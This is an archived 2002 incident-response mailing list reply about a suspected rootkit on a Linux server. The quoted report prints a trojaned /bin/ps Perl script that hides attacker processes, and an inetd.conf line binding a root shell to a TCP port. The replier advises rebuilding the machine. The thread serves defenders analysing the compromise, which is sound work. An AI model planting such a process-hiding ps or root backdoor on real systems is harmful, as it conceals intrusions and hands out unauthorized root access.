Security Incidents mailing list archives

Re: nouser - rootkit ?

From: Eric Brandwine <ericb () UU NET>
Date: 11 Mar 2002 17:57:38 +0000

"du" == Dan Uscatu <duscatu () phenomedia ro> writes:


du>  [root@www /root]# cat /bin/ps
du>  #!/usr/bin/perl
du>  $xargs =join(' ',@ARGV);
du>  $ps = `/usr/lib/libxnotps $xargs \| grep -v nouser \| grep -v noshell \|
du>  grep -v proftp \| grep -v \"/bin/ps\" \| grep -v libxnotps`;
du>  print "$ps";

WOW!  That is really lame!  It may qualify as the first cross-platform
root kit I've ever seen though ;)

This moron clearly does not know how to use perl regexps (among many
other things).  At least use fgrep!

du> i have scanned the machine using chkroot kit... the only funny thing found
du> was an inetd.conf, containing:

du>  [root@www nouser]# cat /etc/inetd.conf
du> 65456    stream  tcp     nowait  root  /bin/sh     sh

du>  of course, inetd is not installed :) that points me to the idea that the
du> process was somehow automated... but i cant find any reference to a rootkit
du> that does these changes. seems pretty stupid for a rootkit  anyway... but i
du> want to be sure no other major changes were made... before i install the
du> production server there.

This looks like a clueless kiddie cobbled together a bunch of stuff he
found on the net, and packaged it up.

Either it's a red herring, and the real root kit is much better
hidden, or it'll be almost trivial to clean up.  But you've no way of
knowing.  I'd rebuild the box from scratch, if it were mine.

Of much more importance is how he got in.  Scrape this loser off your
box, and another one will take his place.  And the new one might not
be quite so incompetent.

ericb
-- 
Eric Brandwine     |  Contrary to the popular belief that it's hard to recover
UUNetwork Security |  information, it's actually starting to appear that it's
ericb () uu net       |  very hard to remove something even if you want to.
+1 703 886 6038    |      - Dan Farmer
Key fingerprint = 3A39 2C2F D5A0 FC7C  5F60 4118 A84A BD5D  59D7 4E3E

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Current thread:

nouser - rootkit ? Dan Uscatu (Mar 10)
- Re: nouser - rootkit ? Eric Brandwine (Mar 11)
  - Re: nouser - rootkit ? Ryan Russell (Mar 11)
  - Re: nouser - rootkit ? Konrad Rieck (Mar 11)
    - Re: nouser - rootkit ? Bruce Ediger (Mar 12)
    - Re: nouser - rootkit ? Kyle R Maxwell (Mar 12)
    - Re: nouser - rootkit ? Jose Nazario (Mar 12)
    - Re: nouser - rootkit ? Eric Brandwine (Mar 12)
    - Re: nouser - rootkit ? [:multiple root kit thread:] Dan Rohan (Mar 12)
    - Re: nouser - rootkit ? Dave Dittrich (Mar 12)
    - Re: nouser - rootkit ? Eric Brandwine (Mar 12)
    - Re: nouser - rootkit ? Brian Hatch (Mar 12)

(Thread continues...)